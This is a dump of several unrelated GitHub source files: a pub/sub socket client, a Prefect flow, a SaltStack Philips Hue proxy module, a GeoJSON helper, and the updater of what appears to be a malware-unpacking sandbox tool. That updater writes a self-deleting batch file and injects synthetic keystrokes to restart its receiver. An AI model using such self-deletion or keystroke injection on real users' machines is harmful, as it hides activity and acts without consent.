  d) Perform KeyboardInterrupt\n    On any other case I will assume that you are trying to publish something\n    If you want to publish something, this must be formed as follows:\n    3 pub #hello This is the first message.\n    The first column in the file represents the number of seconds that the publisher should wait after connecting in order to execute that \n    command (in the above case 3). This number should be greater or equal to 0. The second column represents the command to execute: this \n    will always be pub for the publisher. The third column represents the topic that the publisher will publish to. All topics both for\n    publisher and subscriber are one keyword. If you do not publish something with this formalization, and you have not quit this program, the \n    text you typed will not be published but you will be asked again to give something as input. 
'''\n\n# Function that receives another function and executes it as a daemnon thread\ndef start_thread_daemon(thread_func):\n thread=threading.Thread(target=thread_func,daemon=True)\n thread.start()\n\n#Mandatory import of all 4 first arguments (only - f optional) when calling the file to execute\ndef gethelp(argv): \n arg_help = \"-i -h -p -r -f \"\n try:\n\n # f without : because -f is optional\n opts, args = getopt.getopt(argv[1:], \"si:h:p:r:f\") \n except:\n\n # Function that prints a message to help the user call the program properly - We will define it in a while...\n stop_wrong_import(arg_help) \n \n # We certainly have given less than 4 arguments (or more than five which is also bad) as input so interrupt! ()\n if len (opts)!=4 and len (opts)!=5 : \n stop_wrong_import(arg_help)\n elif len (opts)==4:\n for opt,val in opts:\n\n #Someone needs help, s was typed as argument \n if 's' in opt: \n stop_wrong_import (arg_help)\n if opt not in ['-i', '-h', '-p','-r']:\n stop_wrong_import(arg_help)\n else :\n if val =='-f':\n stop_wrong_import(arg_help)\n else:\n pass\n else:\n pass\n\ndef stop_wrong_import(message): \n print ('Please it is mandatory to import all the following arguments:')\n print(message)\n print ('The 4 mandatory arguments may be inserted at a random order, but if you insert -f , this must be the last argument to be typed ')\n sys.exit(1)\n\n#read the cmd file if exists \ndef read_cmd_file (): \n try:\n\n #Here f is with :, so if it will raise an error it will be that -f had not an input or -f had as input a directory that does not exist\n opts, args = getopt.getopt(sys.argv[1:], \"si:h:p:r:f:\") \n for opt,val in opts:\n if opt=='-f':\n f = open(val,\"r\")\n contents = f.read()\n f.close() \n return contents.splitlines()\n except:\n print ('\\nNo input file was given as -f or incorrect path was given after -f') \n\n\ndef execute_command(command):\n all_info=command.split()\n\n #the first element of the new list is the seconds we will have to wait\n time.sleep(int(all_info[0])) \n\n #We add the Pub _Id to the data that the publisher will transmit. For example, data will \n # be formalized as follows: p1 pub #hello Lalala or p2 pub #world good morning\n data=PUB_ID+' '+all_info[1]+' '\n data=data+' '.join(all_info[2:])\n return data\n\n#Function that initiates a socket.socket which binds the socket of the publisher and \n#connects with the socket that the broker hears the publisher \ndef initiate_socket(): \n global sock\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n # We want our specific publisher to transmit from a specific socket \n sock.bind((HOST,PORT_PUB)) \n\n #Connect to the specific socket that the broker hears the publishers\n sock.connect((HOST, PORT_BROK)) \n\n#Function that sends the message to the broker, after taking it in the proper form by executing\n#execute_command function in it. There is an optional boolean function called waiting. We will use \n#it when the program is entered in mode where the user has to enter his commands manually. This is because\n#we want him to have a little time reading what the broker has returned from the previous message, before\n# he sees the message_to_publisher in his screen (which is a pretty big one). 
After that, he will have the \n#chance to proceed to his next input\ndef execute_pub(text,waiting=False):\n global sock\n data=execute_command(text)\n sock.sendall(bytes(data + \"\\n\", \"utf-8\"))\n \n #As mentioned above this is an optional time sleeping so that the user of the program has time to read what he received from the broker, \n # before he sees in the screen of the command line the whole message_to_publisher. Mind that when this function will be executed for \n # reading all the commands in the -f file, waiting time must not be activated since the message_to_publisher is not printed and the \n # publishments are executed automatically depending on the commands. Moreover, in this sleeping time, the user can not\n # publish manually because the input will be executed after the sleeping.\n if waiting:\n time.sleep(5) \n\n#Receives he info from the broker regarding the situation of his publishments every time he publishes something\ndef always_listening():\n global sock\n\n #just a silly initial message to the terminal of the publisher\n print ('''No matter what happens during the execution of this program, I am a daemon thread that\n ,in 2 seconds from now, will start listening to the broker all the time and print what sends \n back until the execution of the current program is terminated ''')\n while True:\n\n #This is for ConnectionAbortedError, meaning that the Broker shut us down because he has reached max capacity (5) for publishers\n try:\n received = str(sock.recv(1024), \"utf-8\") \n print(received)\n except ConnectionAbortedError:\n break\n\n\n\n\ndef main():\n initiate_socket()\n start_thread_daemon(always_listening)\n\n #2 seconds for the publisher to read the first print message inside the function always_listening\n time.sleep(2) \n inputs=read_cmd_file ()\n if inputs is None:\n print ('You did not give input file, proceeding to manually input your publishments!\\n')\n pass\n else:\n for command in inputs:\n\n #Here we leave the default waiting=False because we don't want to pause the program. The messages from \n #the broker will be clear to see since print (message_to_publisher) won't be executed.\n execute_pub(command) \n\n #In my localhost there was a little lag in the final receipt of the message from the broker, so we give 1 second notice\n # to the deamon thread (always listening) to deliver us the final message before the message_to_publisher appears on the screen\n time.sleep(1) \n print (message_to_publisher)\n text_to_publish=input()\n try:\n while text_to_publish!='quit':\n\n #Here we implement waiting=True because we want to pause the program. \n #The messages from the broker wont be clear to see since print (message_to_publisher) will be executed to give instructions.\n #to the user for manual input of the messages to be published\n execute_pub(text_to_publish,waiting=True)\n\n #In my laptop there was a little lag in the final receipt of the message from the broker, so we give 1 second notice\n # to the deamon thread (always listening) to deliver us the final message before the message_to_publisher appears on the screen\n time.sleep(1) \n print (message_to_publisher)\n text_to_publish=input() \n except ValueError:\n print ('You gave input that did not start with an integer and then space. Quiting...')\n sys.exit(0)\n except IndexError:\n print ('You gave empty input. 
Quitting...')\n        sys.exit(0)\n    \nif __name__ == \"__main__\":\n\n    # We want to make sure that we will receive all the necessary arguments when executing the program\n    gethelp(sys.argv) \n\n    #reading the arguments from the execution of the .py file\n    for i in range (len(sys.argv)):\n        if sys.argv[i]=='-r':\n            PORT_PUB=int(sys.argv[i+1])\n        if sys.argv[i]=='-h':\n            HOST= sys.argv[i+1]\n        if sys.argv[i]=='-p':\n            PORT_BROK= int(sys.argv[i+1])\n        if sys.argv[i]=='-i':\n            PUB_ID=sys.argv[i+1]\n    try:\n        main()\n\n    #This exception handles the overload of the system. If the broker has already five publishers connected, we will exit gently. We have raised\n    #this exception both here and in daemon thread of always_listening function, because it would raise that error in both parts if the \n    # broker had closed the socket for that reason.\n    except ConnectionAbortedError: \n        print('\\nFull capacity of publishers. Please try to connect in a while if a connected publisher quits his connection')\n        time.sleep(2)\n        sys.exit(0)\n\n    #This exception may only be executed at the time of the manual inputs of the publisher\n    except KeyboardInterrupt: \n        print ('You performed KeyboardInterrupt. Quitting....')\n        sys.exit(0)\n\n\n","repo_name":"nhvd3500111/Pub_Sub_Broker","sub_path":"pub.py","file_name":"pub.py","file_ext":"py","file_size_in_byte":10425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74125245052","text":"from prefect import Flow, Parameter\nfrom eit_pipeline.tasks.io import seq_from_old_structure, save_raw_data\nfrom eit_pipeline.tasks.filesystem import join_path, safe_create_dir, get_home_path\nfrom eit_pipeline.utils import load_params_for_flow\nfrom prefect import context\n\nwith Flow('Old2NewDataStructure') as flow:\n    local_root = Parameter('local_root')\n    data_root = Parameter('data_root')\n    seq_path = Parameter('seq_path')\n    home_path = get_home_path()\n\n\n    data_path = join_path((home_path, data_root, seq_path))\n    analysis_path = join_path((home_path, local_root, seq_path))\n    analysis_path_2 = safe_create_dir(analysis_path)\n\n    seq = seq_from_old_structure(data_path)\n    save_raw_data(seq, analysis_path_2)\n\nif __name__ == \"__main__\":\n    params = load_params_for_flow(flow, \"../../config-files/old2new.yaml\")\n    flow.register(project_name='absorption imaging')\n    #flow.run(parameters=params)\n","repo_name":"dgrims/imaging_prefect_pipeline","sub_path":"eit_pipeline/flows/old_to_new_datastructure.py","file_name":"old_to_new_datastructure.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19196455364","text":"# imports\nimport math\n\n# list of numbers to divide by\nnumbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17]\n\n# starting number\nx = 1\n\n# main loop to increment x and check it\nwhile x > 0:\n    print(x)\n    no_remainder = True\n\n    # divide each number in 'numbers' list by the current value of x\n    for num in numbers:\n        if math.remainder(x, num) != 0.0:\n\n            # change value of 'no_remainder' if the operation has a remainder and move the loop to the next number\n            no_remainder = False\n            break\n    \n    # check value of 'no_remainder' variable\n    if no_remainder == True:\n        print(x)\n        break\n    x += 1\n","repo_name":"BarrySang/lcm-calculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"12848206004","text":"import http.client\nimport logging\nimport time\n\nimport salt.utils.json\nfrom salt.exceptions import CommandExecutionError, MinionError\n\n__proxyenabled__ = [\"philips_hue\"]\n\nCONFIG = {}\nlog = logging.getLogger(__file__)\n\n\nclass Const:\n \"\"\"\n Constants for the lamp operations.\n \"\"\"\n\n LAMP_ON = {\"on\": True, \"transitiontime\": 0}\n LAMP_OFF = {\"on\": False, \"transitiontime\": 0}\n\n COLOR_WHITE = {\"xy\": [0.3227, 0.329]}\n COLOR_DAYLIGHT = {\"xy\": [0.3806, 0.3576]}\n COLOR_RED = {\"hue\": 0, \"sat\": 254}\n COLOR_GREEN = {\"hue\": 25500, \"sat\": 254}\n COLOR_ORANGE = {\"hue\": 12000, \"sat\": 254}\n COLOR_PINK = {\"xy\": [0.3688, 0.2095]}\n COLOR_BLUE = {\"hue\": 46920, \"sat\": 254}\n COLOR_YELLOW = {\"xy\": [0.4432, 0.5154]}\n COLOR_PURPLE = {\"xy\": [0.3787, 0.1724]}\n\n\ndef __virtual__():\n \"\"\"\n Validate the module.\n \"\"\"\n return True\n\n\ndef init(cnf):\n \"\"\"\n Initialize the module.\n \"\"\"\n CONFIG[\"host\"] = cnf.get(\"proxy\", {}).get(\"host\")\n if not CONFIG[\"host\"]:\n raise MinionError(\n message=\"Cannot find 'host' parameter in the proxy configuration\"\n )\n\n CONFIG[\"user\"] = cnf.get(\"proxy\", {}).get(\"user\")\n if not CONFIG[\"user\"]:\n raise MinionError(\n message=\"Cannot find 'user' parameter in the proxy configuration\"\n )\n\n CONFIG[\"uri\"] = \"/api/{}\".format(CONFIG[\"user\"])\n\n\ndef ping(*args, **kw):\n \"\"\"\n Ping the lamps.\n \"\"\"\n # Here blink them\n return True\n\n\ndef shutdown(opts, *args, **kw):\n \"\"\"\n Shuts down the service.\n \"\"\"\n # This is no-op method, which is required but makes nothing at this point.\n return True\n\n\ndef _query(lamp_id, state, action=\"\", method=\"GET\"):\n \"\"\"\n Query the URI\n\n :return:\n \"\"\"\n # Because salt.utils.query is that dreadful... 
:(\n\n err = None\n url = \"{}/lights{}\".format(\n CONFIG[\"uri\"], lamp_id and \"/{}\".format(lamp_id) or \"\"\n ) + (action and \"/{}\".format(action) or \"\")\n conn = http.client.HTTPConnection(CONFIG[\"host\"])\n if method == \"PUT\":\n conn.request(method, url, salt.utils.json.dumps(state))\n else:\n conn.request(method, url)\n resp = conn.getresponse()\n\n if resp.status == http.client.OK:\n res = salt.utils.json.loads(resp.read())\n else:\n err = \"HTTP error: {}, {}\".format(resp.status, resp.reason)\n conn.close()\n if err:\n raise CommandExecutionError(err)\n\n return res\n\n\ndef _set(lamp_id, state, method=\"state\"):\n \"\"\"\n Set state to the device by ID.\n\n :param lamp_id:\n :param state:\n :return:\n \"\"\"\n try:\n res = _query(lamp_id, state, action=method, method=\"PUT\")\n except Exception as err: # pylint: disable=broad-except\n raise CommandExecutionError(err)\n\n res = len(res) > 1 and res[-1] or res[0]\n if res.get(\"success\"):\n res = {\"result\": True}\n elif res.get(\"error\"):\n res = {\n \"result\": False,\n \"description\": res[\"error\"][\"description\"],\n \"type\": res[\"error\"][\"type\"],\n }\n\n return res\n\n\ndef _get_devices(params):\n \"\"\"\n Parse device(s) ID(s) from the common params.\n\n :param params:\n :return:\n \"\"\"\n if \"id\" not in params:\n raise CommandExecutionError(\"Parameter ID is required.\")\n\n return (\n type(params[\"id\"]) == int\n and [params[\"id\"]]\n or [int(dev) for dev in params[\"id\"].split(\",\")]\n )\n\n\ndef _get_lights():\n \"\"\"\n Get all available lighting devices.\n \"\"\"\n return _query(None, None)\n\n\n# Callers\ndef call_lights(*args, **kwargs):\n \"\"\"\n Get info about all available lamps.\n\n Options:\n\n * **id**: Specifies a device ID. Can be a comma-separated values. All, if omitted.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' hue.lights\n salt '*' hue.lights id=1\n salt '*' hue.lights id=1,2,3\n \"\"\"\n res = dict()\n lights = _get_lights()\n for dev_id in \"id\" in kwargs and _get_devices(kwargs) or sorted(lights.keys()):\n if lights.get(str(dev_id)):\n res[dev_id] = lights[str(dev_id)]\n\n return res or False\n\n\ndef call_switch(*args, **kwargs):\n \"\"\"\n Switch lamp ON/OFF.\n\n If no particular state is passed,\n then lamp will be switched to the opposite state.\n\n Options:\n\n * **id**: Specifies a device ID. Can be a comma-separated values. All, if omitted.\n * **on**: True or False. Inverted current, if omitted\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' hue.switch\n salt '*' hue.switch id=1\n salt '*' hue.switch id=1,2,3 on=True\n \"\"\"\n out = dict()\n devices = _get_lights()\n for dev_id in \"id\" not in kwargs and sorted(devices.keys()) or _get_devices(kwargs):\n if \"on\" in kwargs:\n state = kwargs[\"on\"] and Const.LAMP_ON or Const.LAMP_OFF\n else:\n # Invert the current state\n state = (\n devices[str(dev_id)][\"state\"][\"on\"] and Const.LAMP_OFF or Const.LAMP_ON\n )\n out[dev_id] = _set(dev_id, state)\n\n return out\n\n\ndef call_blink(*args, **kwargs):\n \"\"\"\n Blink a lamp. If lamp is ON, then blink ON-OFF-ON, otherwise OFF-ON-OFF.\n\n Options:\n\n * **id**: Specifies a device ID. Can be a comma-separated values. All, if omitted.\n * **pause**: Time in seconds. Can be less than 1, i.e. 0.7, 0.5 sec.\n\n CLI Example:\n\n .. 
code-block:: bash\n\n salt '*' hue.blink id=1\n salt '*' hue.blink id=1,2,3\n \"\"\"\n devices = _get_lights()\n pause = kwargs.get(\"pause\", 0)\n res = dict()\n for dev_id in \"id\" not in kwargs and sorted(devices.keys()) or _get_devices(kwargs):\n state = devices[str(dev_id)][\"state\"][\"on\"]\n _set(dev_id, state and Const.LAMP_OFF or Const.LAMP_ON)\n if pause:\n time.sleep(pause)\n res[dev_id] = _set(dev_id, not state and Const.LAMP_OFF or Const.LAMP_ON)\n\n return res\n\n\ndef call_ping(*args, **kwargs):\n \"\"\"\n Ping the lamps by issuing a short inversion blink to all available devices.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' hue.ping\n \"\"\"\n errors = dict()\n for dev_id, dev_status in call_blink().items():\n if not dev_status[\"result\"]:\n errors[dev_id] = False\n\n return errors or True\n\n\ndef call_status(*args, **kwargs):\n \"\"\"\n Return the status of the lamps.\n\n Options:\n\n * **id**: Specifies a device ID. Can be a comma-separated values. All, if omitted.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' hue.status\n salt '*' hue.status id=1\n salt '*' hue.status id=1,2,3\n \"\"\"\n res = dict()\n devices = _get_lights()\n for dev_id in \"id\" not in kwargs and sorted(devices.keys()) or _get_devices(kwargs):\n dev_id = str(dev_id)\n res[dev_id] = {\n \"on\": devices[dev_id][\"state\"][\"on\"],\n \"reachable\": devices[dev_id][\"state\"][\"reachable\"],\n }\n\n return res\n\n\ndef call_rename(*args, **kwargs):\n \"\"\"\n Rename a device.\n\n Options:\n\n * **id**: Specifies a device ID. Only one device at a time.\n * **title**: Title of the device.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' hue.rename id=1 title='WC for cats'\n \"\"\"\n dev_id = _get_devices(kwargs)\n if len(dev_id) > 1:\n raise CommandExecutionError(\"Only one device can be renamed at a time\")\n\n if \"title\" not in kwargs:\n raise CommandExecutionError(\"Title is missing\")\n\n return _set(dev_id[0], {\"name\": kwargs[\"title\"]}, method=\"\")\n\n\ndef call_alert(*args, **kwargs):\n \"\"\"\n Lamp alert\n\n Options:\n\n * **id**: Specifies a device ID. Can be a comma-separated values. All, if omitted.\n * **on**: Turns on or off an alert. Default is True.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' hue.alert\n salt '*' hue.alert id=1\n salt '*' hue.alert id=1,2,3 on=false\n \"\"\"\n res = dict()\n\n devices = _get_lights()\n for dev_id in \"id\" not in kwargs and sorted(devices.keys()) or _get_devices(kwargs):\n res[dev_id] = _set(\n dev_id, {\"alert\": kwargs.get(\"on\", True) and \"lselect\" or \"none\"}\n )\n\n return res\n\n\ndef call_effect(*args, **kwargs):\n \"\"\"\n Set an effect to the lamp.\n\n Options:\n\n * **id**: Specifies a device ID. Can be a comma-separated values. All, if omitted.\n * **type**: Type of the effect. Possible values are \"none\" or \"colorloop\". Default \"none\".\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' hue.effect\n salt '*' hue.effect id=1\n salt '*' hue.effect id=1,2,3 type=colorloop\n \"\"\"\n res = dict()\n\n devices = _get_lights()\n for dev_id in \"id\" not in kwargs and sorted(devices.keys()) or _get_devices(kwargs):\n res[dev_id] = _set(dev_id, {\"effect\": kwargs.get(\"type\", \"none\")})\n\n return res\n\n\ndef call_color(*args, **kwargs):\n \"\"\"\n Set a color to the lamp.\n\n Options:\n\n * **id**: Specifies a device ID. Can be a comma-separated values. All, if omitted.\n * **color**: Fixed color. Values are: red, green, blue, orange, pink, white,\n yellow, daylight, purple. 
Default white.\n * **transition**: Transition 0~200.\n\n Advanced:\n\n * **gamut**: XY coordinates. Use a gamut according to the Philips HUE devices documentation.\n More: http://www.developers.meethue.com/documentation/hue-xy-values\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' hue.color\n salt '*' hue.color id=1\n salt '*' hue.color id=1,2,3 color=red transition=30\n salt '*' hue.color id=1 gamut=0.3,0.5\n \"\"\"\n res = dict()\n\n colormap = {\n \"red\": Const.COLOR_RED,\n \"green\": Const.COLOR_GREEN,\n \"blue\": Const.COLOR_BLUE,\n \"orange\": Const.COLOR_ORANGE,\n \"pink\": Const.COLOR_PINK,\n \"white\": Const.COLOR_WHITE,\n \"yellow\": Const.COLOR_YELLOW,\n \"daylight\": Const.COLOR_DAYLIGHT,\n \"purple\": Const.COLOR_PURPLE,\n }\n\n devices = _get_lights()\n color = kwargs.get(\"gamut\")\n if color:\n color = color.split(\",\")\n if len(color) == 2:\n try:\n color = {\"xy\": [float(color[0]), float(color[1])]}\n except Exception as ex: # pylint: disable=broad-except\n color = None\n else:\n color = None\n\n if not color:\n color = colormap.get(kwargs.get(\"color\", \"white\"), Const.COLOR_WHITE)\n color.update({\"transitiontime\": max(min(kwargs.get(\"transition\", 0), 200), 0)})\n\n for dev_id in \"id\" not in kwargs and sorted(devices.keys()) or _get_devices(kwargs):\n res[dev_id] = _set(dev_id, color)\n\n return res\n\n
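# Added usage sketch (device IDs hypothetical): call_color(id=\"1,2\", color=\"red\",\n# transition=30) resolves \"red\" through the colormap above and sends the\n# resulting xy-gamut dict plus {\"transitiontime\": 30} to lamps 1 and 2.\n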
\ndef call_brightness(*args, **kwargs):\n \"\"\"\n Set the brightness of the lamp.\n\n Arguments:\n\n * **value**: 0~255 brightness of the lamp.\n\n Options:\n\n * **id**: Specifies a device ID. Can be comma-separated values. All, if omitted.\n * **transition**: Transition 0~200. Default 0.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' hue.brightness value=100\n salt '*' hue.brightness id=1 value=150\n salt '*' hue.brightness id=1,2,3 value=255\n \"\"\"\n res = dict()\n\n if \"value\" not in kwargs:\n raise CommandExecutionError(\"Parameter 'value' is missing\")\n\n try:\n brightness = max(min(int(kwargs[\"value\"]), 244), 1)\n except Exception as err: # pylint: disable=broad-except\n raise CommandExecutionError(\"Parameter 'value' does not contain an integer\")\n\n try:\n transition = max(min(int(kwargs[\"transition\"]), 200), 0)\n except Exception as err: # pylint: disable=broad-except\n transition = 0\n\n devices = _get_lights()\n for dev_id in \"id\" not in kwargs and sorted(devices.keys()) or _get_devices(kwargs):\n res[dev_id] = _set(dev_id, {\"bri\": brightness, \"transitiontime\": transition})\n\n return res\n\n\ndef call_temperature(*args, **kwargs):\n \"\"\"\n Set the mired color temperature. More: http://en.wikipedia.org/wiki/Mired\n\n Arguments:\n\n * **value**: 150~500.\n\n Options:\n\n * **id**: Specifies a device ID. Can be comma-separated values. All, if omitted.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' hue.temperature value=150\n salt '*' hue.temperature value=150 id=1\n salt '*' hue.temperature value=150 id=1,2,3\n \"\"\"\n res = dict()\n\n if \"value\" not in kwargs:\n raise CommandExecutionError(\"Parameter 'value' (150~500) is missing\")\n try:\n value = max(min(int(kwargs[\"value\"]), 500), 150)\n except Exception as err: # pylint: disable=broad-except\n raise CommandExecutionError(\"Parameter 'value' does not contain an integer\")\n\n devices = _get_lights()\n for dev_id in \"id\" not in kwargs and sorted(devices.keys()) or _get_devices(kwargs):\n res[dev_id] = _set(dev_id, {\"ct\": value})\n\n return res\n","repo_name":"saltstack/salt","sub_path":"salt/proxy/philips_hue.py","file_name":"philips_hue.py","file_ext":"py","file_size_in_byte":12811,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"14003135921","text":"import os\nimport json\nfrom typing import Dict, Any, Optional, Union\nfrom area import area\n\n\nGeoJSON = Dict[str, Any]\n\n\ndef get_district_geojson(district: Optional[str] = None) -> Union[Dict[str, GeoJSON], GeoJSON]:\n \"\"\"\n Gets the Berlin districts or a single one of them (if a district name is specified).\n :param district: The optional district to return; if None, all are returned.\n :return: The district or dictionary of districts.\n \"\"\"\n dir = os.path.dirname(os.path.realpath(__file__))\n file = os.path.join(dir, 'berlin_bezirke_osm_mh.geojson')\n with open(file, 'r') as f:\n data = json.load(f)['features']\n districts = {d['properties']['name']: d['geometry'] for d in data}\n return districts if district is None else districts[district]\n\n\ndef geojson_area(geojson: GeoJSON, scale: float = 1.0) -> float:\n \"\"\"\n Gets the area of a GeoJSON object.\n :param geojson: The GeoJSON object.\n :param scale: The scale; for km, use 0.001.\n :return: The area.\n \"\"\"\n a = area(geojson)\n return a * (scale ** 2)\n\n\nif __name__ == '__main__':\n from pprint import pprint\n districts = get_district_geojson()\n pprint(districts)\n print('Berlin Mitte is', geojson_area(districts['Mitte'], 0.001), 'km².')\n","repo_name":"sunsided/osm-berlin","sub_path":"supplemental/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"70034410812","text":"import argparse\nimport base64\nimport json\nimport time\nimport zipfile\nimport os\nimport shutil\nimport socket\nimport subprocess\nimport traceback\nimport logging\nfrom ctypes import windll\nfrom utility.win_env import get_user_path\n\n\ndef extract(zip_path, target_path):\n if os.path.exists(target_path):\n shutil.rmtree(target_path)\n with zipfile.ZipFile(zip_path, \"r\") as zf:\n zf.extractall(target_path)\n os.remove(zip_path)\n\n\ndef send_keycode(key_code):\n windll.user32.keybd_event(key_code, 0x45, 1 | 0, 0)\n windll.user32.keybd_event(key_code, 0x45, 1 | 2, 0)\n\n\nclass Updater:\n def __init__(self):\n self.userPath = get_user_path()\n self.config = None\n with open(os.path.join(self.userPath, \"config\"), \"rb\") as f_in:\n self.config = json.loads(f_in.read())\n paths = self.config[\"client_paths\"]\n self.roamerRepoPath = paths[\"repo\"]\n self.roamerZipPath = paths[\"repo_zip\"]\n self.receiverPath = paths[\"receiver\"]\n self.toWhitelistPath = paths[\"to_whitelist\"]\n self.sample = None\n self.tasks = self.config[\"tasks\"]\n self.isLocalUnpacking = False\n self.sock = None\n 
self.unpacker = None\n # This socket has to be created up front, so that there is no interaction with the hard disk later\n hackSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n def set_local_unpacker(self, value):\n if value:\n logging.info(\"RoAMer Updater set to local mode.\")\n self.isLocalUnpacking = value\n\n def send_output(self, output):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_address = (self.config[\"host_ip\"], self.config[\"host_port\"])\n logging.info(\n \"sending output to %s:%d\", self.config[\"host_ip\"], self.config[\"host_port\"]\n )\n self.sock.connect(server_address)\n self.sock.sendall(bytes(json.dumps(output), encoding=\"utf-8\"))\n logging.info(\"closing communications\")\n self.sock.shutdown(socket.SHUT_WR)\n self.sock.close()\n\n def send_nothing(self):\n self.send_output(\"empty\")\n\n def extract_source(self):\n logging.info(\"Remove old repo before extracting source\")\n self.cleanup([self.roamerRepoPath])\n logging.info(\"Extract source code\")\n extract(self.roamerZipPath, self.roamerRepoPath)\n\n def compile_source(self):\n logging.info(\"Compile source code\")\n compile_process = subprocess.Popen(\n os.path.join(self.roamerRepoPath, \"compile.bat\"), cwd=self.roamerRepoPath\n )\n compile_process.wait()\n\n def restart_receiver(self, clear_screen=True):\n logging.info(\"Restart the Receiver\")\n send_keycode(0x0D) # Enter\n\n if clear_screen:\n send_keycode(ord(\"C\"))\n send_keycode(ord(\"L\"))\n send_keycode(ord(\"S\"))\n send_keycode(0x0D) # Enter\n send_keycode(0x26) # Up\n\n # restart roamer receiver\n send_keycode(0x26) # Up\n send_keycode(0x0D) # Enter\n\n def remove_this_script(self):\n if self.config[\"staged_update\"]:\n logging.info(\"Remove this update script\")\n os.remove(os.path.join(self.userPath, \"main.exe\"))\n os.remove(os.path.abspath(__file__))\n else:\n logging.info(\"Remove this executable\")\n tmp_bat_path = os.path.join(self.userPath, \"tmp.bat\")\n self_delete_cmd = f\"\"\"\n @echo off\n :start\n if exist {os.path.join(self.userPath, \"main.exe\")} goto delete\n del {tmp_bat_path}\n :delete\n del {os.path.join(self.userPath, \"main.exe\")}\n goto start\n \"\"\"\n with open(tmp_bat_path, \"w\") as f:\n f.write(self_delete_cmd)\n subprocess.Popen(f\"cmd /c {tmp_bat_path}\", stdout=None)\n
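 # Note (added): the batch file above keeps retrying \"del main.exe\" until the\n # running executable is no longer locked, then removes itself (tmp.bat) -\n # a common self-deletion pattern for Windows executables.\n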
os.path.join(self.roamerRepoPath, \"updater\", \"dist\", \"update_launcher.exe\")\n ),\n \"updater\": self._get_content_of_file_as_base64(\n os.path.join(self.roamerRepoPath, \"updater\", \"dist\", \"updater.exe\")\n ),\n }\n )\n if \"whitelist\" in self.tasks:\n result[\"pe_header_whitelist.json\"] = self._get_content_of_file_as_base64(\n os.path.join(self.userPath, \"pe_header_whitelist.json\")\n )\n\n if len(result) != 0:\n self.send_output(result)\n else:\n self.send_nothing()\n\n def cleanup(self, list):\n for entry in list:\n if not os.path.exists(entry):\n continue\n if os.path.isfile(entry):\n os.remove(entry)\n elif os.path.isdir(entry):\n shutil.rmtree(entry)\n\n def run(self):\n results = {}\n # self.load_config()\n start_time = time.time()\n receiver_termination_duration = 4\n strict_cleanup_list = [\n os.path.join(self.userPath, \"config\"),\n os.path.join(self.userPath, \"sample\"),\n ]\n\n if not self.isLocalUnpacking:\n self.send_output(\"RUNNING\")\n\n try:\n if \"compile_on_client\" in self.tasks:\n self.extract_source()\n self.compile_source()\n receiver_source_path = os.path.join(self.roamerRepoPath, \"receiver\", \"dist\", \"main.exe\")\n whitelister_source_path = (\n os.path.join(self.roamerRepoPath, \"whitelister\", \"dist\", \"PEHeaderWhitelister.exe\")\n )\n strict_cleanup_list += [self.roamerRepoPath, self.roamerZipPath]\n\n if \"receiver_bin_to_client\" in self.tasks:\n receiver_source_path = os.path.join(self.userPath, \"new_receiver.exe\")\n strict_cleanup_list += [receiver_source_path]\n\n if \"overwrite_receiver\" in self.tasks:\n now = time.time()\n sleep_time = start_time + receiver_termination_duration - now\n if sleep_time > 0:\n time.sleep(sleep_time)\n self.replace_receiver(receiver_source_path)\n\n if \"whitelister_bin_to_client\" in self.tasks:\n whitelister_source_path = os.path.join(self.userPath, \"whitelister.exe\")\n strict_cleanup_list += [whitelister_source_path]\n\n if \"whitelist\" in self.tasks:\n self.update_whitelist(whitelister_source_path)\n\n if not self.isLocalUnpacking:\n self.gather_data_and_send()\n\n if \"reinit_and_store\" in self.tasks:\n if self.config[\"requires_cleaning_before_snapshot\"]:\n self.cleanup(strict_cleanup_list)\n self.remove_this_script()\n self.restart_receiver()\n\n except Exception as e:\n if not self.isLocalUnpacking:\n self.send_output(f\"EXCEPTION from client:\\n{traceback.format_exc()}\")\n else:\n print(traceback.format_exc())\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(\n format=\"%(asctime)-15s %(levelname)-7s %(module)s.%(funcName)s(): %(message)s\",\n level=logging.DEBUG,\n )\n\n parser = argparse.ArgumentParser(description=\"RoAMer Update Module.\")\n parser.add_argument(\n \"--local\",\n action=\"store_true\",\n help=\"Run the updater locally and don't send back results.\",\n )\n args = parser.parse_args()\n updater = Updater()\n updater.set_local_unpacker(args.local)\n updater.run()\n","repo_name":"fkie-cad/RoAMer","sub_path":"updater/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":9093,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"78"} +{"seq_id":"31811890870","text":"class Graph:\n\n def __init__(self, vertices):\n self.vertices = vertices\n self.adj_list = {}\n\n for vertice in self.vertices:\n self.adj_list[vertice] = []\n \n def add_edge(self, vertice, edge):\n self.adj_list[vertice].append(edge)\n self.adj_list[edge].append(vertice)\n\n def print_adj(self):\n for vertice in self.vertices:\n print(vertice, 
